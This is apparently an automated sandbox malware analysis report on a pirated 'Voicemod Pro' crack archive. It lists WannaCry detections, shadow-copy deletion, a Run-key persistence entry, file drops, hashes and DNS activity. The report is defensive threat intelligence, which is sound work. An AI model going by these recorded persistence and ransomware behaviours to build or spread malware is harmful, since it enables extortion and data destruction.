Malware Analysis Report

2024-12-07 02:09

Sample ID 241115-yw1alavlfl
Target Voicemod Pro by mr.motchy.rar
SHA256 7bc72601a99488910e0e3ebfd167b0e6c6a66ac7aa0de499699b7621859e320f
Tags
discovery wannacry defense_evasion execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bc72601a99488910e0e3ebfd167b0e6c6a66ac7aa0de499699b7621859e320f

Threat Level: Known bad

The file Voicemod Pro by mr.motchy.rar was found to be: Known bad.

Malicious Activity Summary

discovery wannacry defense_evasion execution impact persistence ransomware spyware stealer worm

Wannacry

Wannacry family

Deletes shadow copies

Drops file in Drivers directory

Drops startup file

Modifies file permissions

Adds Run key to start application

Downloads MZ/PE file

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Drops file in System32 directory

Loads dropped DLL

Drops file in Program Files directory

Drops file in Windows directory

Checks installed software on the system

Executes dropped EXE

Enumerates physical storage devices

Unsigned PE

Reads user/profile data of web browsers

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

NTFS ADS

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-15 20:09

Signatures

Unsigned PE

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2356 -s 628

Network

N/A

Files

memory/2356-0-0x000007FEF6443000-0x000007FEF6444000-memory.dmp

memory/2356-1-0x000000013F1D0000-0x000000013F482000-memory.dmp

memory/2356-2-0x000007FEF6440000-0x000007FEF6E2C000-memory.dmp

memory/2356-3-0x000007FEF6440000-0x000007FEF6E2C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |

Files

memory/2324-0-0x00007FF9A1F83000-0x00007FF9A1F85000-memory.dmp

memory/2324-1-0x000001EA8D0F0000-0x000001EA8D3A2000-memory.dmp

memory/2324-2-0x00007FF9A1F80000-0x00007FF9A2A41000-memory.dmp

memory/2324-3-0x00007FF9A1F80000-0x00007FF9A2A41000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:12

Platform

win7-20240903-en

Max time kernel

149s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Signatures

Executes dropped EXE

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp | N/A |

System Location Discovery: System Language Discovery

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp | N/A |

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp" /SL5="$400F2,22991991,87040,C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Network

N/A

Files

memory/2376-0-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2376-2-0x0000000000401000-0x000000000040C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp

MD5 1a9f24ba757fd08f3b4db5570cd1bfd0
SHA1 6c8e5ee1db1bb8471dc2c2c7a1d9835d60df2d8d
SHA256 326071c6e04b3552414337cea066d809d987dbddbc8ad717626abc9dff748956
SHA512 bbc2bc152363d789c636941f71894b8a6062a5b37b33748c5e7eb6014bbb8ee0461c29fd892272758ece489abbe7cc4e0695f094a4963411723f698456c308a6

memory/2520-8-0x0000000000400000-0x00000000004C6000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P4HD6.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2376-14-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2520-15-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-17-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-19-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-21-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-23-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-25-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-27-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-29-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-31-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-33-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-35-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-37-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-39-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-41-0x0000000000400000-0x00000000004C6000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Signatures

Wannacry

ransomware worm wannacry

Wannacry family

wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\system32\drivers\SETB17.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\drmk.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\portcls.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\drivers\SETC9D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\drmk.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\portcls.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\SETB17.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\vmdrv.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\SETC9D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\vmdrv.sys | C:\Windows\system32\DrvInst.exe | N/A |

Drops startup file

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD55B4.tmp | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD55CB.tmp | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |

Modifies file permissions

discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |

Adds Run key to start application

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Voicemod = "\"C:\\Program Files\\Voicemod Desktop\\VoicemodDesktop.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rxknciwttsoogz987 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |

Downloads MZ/PE file

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |

Drops file in System32 directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET859.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET85A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET848.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET859.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET848.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET85A.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.sys | C:\Windows\system32\DrvInst.exe | N/A |

Sets desktop wallpaper using registry

ransomware
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |

Checks installed software on the system

discovery

Drops file in Program Files directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\Voicemod Desktop\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-OJCHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-85JK1.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\ru\is-RTRJI.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\NAudio.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\ko\is-TKNHH.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\ko\is-JPU75.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\Resources\DefaultSounds\44100\is-1HQUK.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\es\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\pt\VoicemodDesktop.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\driver\is-N1JNR.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\is-A0KL8.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\is-2GT01.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\de\is-1MQ0T.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\Hardcodet.Wpf.TaskbarNotification.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\de\VoicemodDesktop.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-PN2K5.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\Resources\DefaultSounds\48000\is-66T7R.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\is-9DUP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\de\is-DR5RG.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\driver\uninstalldriver.log | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\WpfAnimatedGif.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\fr\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\ko\AutoUpdater.NET.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\fr\AutoUpdater.NET.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-6Q181.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-LP7TB.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-1HGP6.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\es\is-NMCJH.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\zh\AutoUpdater.NET.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\pt\is-1SJNR.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\driver\is-4BKBK.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\driver\is-8NGH1.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-7EM6K.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\es\AutoUpdater.NET.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\VoicemodControls.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\ru\VoicemodDesktop.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-EGR5F.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-RTML3.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-0E9QR.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\GoogleAnalytics.Core.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\es\VoicemodDesktop.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\ru\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\driver\is-KN36C.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-6IQCO.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\zh\is-M67TM.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\fr\is-F9T2F.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\ko\is-HSLPH.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\Newtonsoft.Json.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\VoicemodSDKDotNET.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-VOAHE.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\zh\is-EBR74.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\ru\is-KIFQ0.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\fr\is-UQ37V.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\pt\is-FGTO9.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\lib\AutoUpdater.NET.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\zh\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\ko\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\pt\SimpleConverter.resources.dll | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\lib\is-JBBHD.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\zh\is-PBNMS.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File created | C:\Program Files\Voicemod Desktop\fr\is-B9DQ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| File opened for modification | C:\Program Files\Voicemod Desktop\driver\DriverPackageUninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |

Drops file in Windows directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\INF\oem0.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\INF\oem1.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File created | C:\Windows\INF\oem2.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File created | C:\Windows\INF\c_media.PNF | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files\Voicemod Desktop\driver\devcon.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |

Loads dropped DLL

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp | N/A |
| N/A | N/A | C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
| N/A | N/A | C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe | N/A |
